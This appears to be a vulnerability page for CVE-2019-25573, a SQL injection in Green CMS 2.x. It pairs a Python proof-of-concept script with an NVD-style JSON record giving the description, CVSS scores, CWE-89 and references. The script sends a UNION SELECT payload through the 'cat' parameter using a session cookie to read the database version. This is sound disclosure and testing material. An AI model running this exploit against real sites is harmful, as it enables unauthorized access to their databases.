CVE-2019-25573

# PoC for CVE-2019-25573 # Target: Green CMS 2.x # Description: SQL Injection via 'cat' parameter in index.php # Note: Requires authentication (Low privilege user) import requests def exploit_green_cms(target_url, session_cookie): """ Exploit the SQL injection vulnerability in Green CMS. """ # The vulnerable endpoint url = f"{target_url}/index.php" # Headers with the authenticated session cookie cookies = { "PHPSESSID": session_cookie } # Malicious payload to test SQL injection (e.g., extracting database version) # Payload: 'cat=1 UNION SELECT 1,2,version(),4,5,6,7,8,9,10-- -' payload = "1 UNION SELECT 1,2,version(),4,5,6,7,8,9,10-- -" params = { "m": "admin", "c": "posts", "a": "index", "cat": payload } try: response = requests.get(url, params=params, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check the response content for database version output.") # In a real scenario, you would parse the HTML to extract the data print("[+] Response snippet:") print(response.text[500:1000]) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace these values with actual target and session TARGET = "http://localhost" SESSION_ID = "vulnerable_session_id" exploit_green_cms(TARGET, SESSION_ID)

{"cve": {"id": "CVE-2019-25573", "sourceIdentifier": "[email protected]", "published": "2026-03-21T16:16:00.753", "lastModified": "2026-03-24T16:39:34.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Green CMS 2.x contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the cat parameter. Attackers can send GET requests to index.php with m=admin, c=posts, a=index parameters and inject SQL code in the cat parameter to manipulate database queries and extract sensitive information."}, {"lang": "es", "value": "Green CMS 2.x contiene una vulnerabilidad de inyección SQL que permite a atacantes autenticados ejecutar consultas SQL arbitrarias inyectando código malicioso a través del parámetro cat. Los atacantes pueden enviar solicitudes GET a index.php con los parámetros m=admin, c=posts, a=index e inyectar código SQL en el parámetro cat para manipular consultas de base de datos y extraer información sensible."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:njtech:greencms:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.1.0612", "versionEndIncluding": "2.3.0603", "matchCriteriaId": "A9F05D4C-EAD2-4BE9-8C3B-6AC77BA24DE2"}]}]}], "references": [{"url": "http://www.greencms.net/", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://codeload.github.com/GreenCMS/GreenCMS/zip/beta", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46244", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/green-cms-2-x-sql-injection-via-cat-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}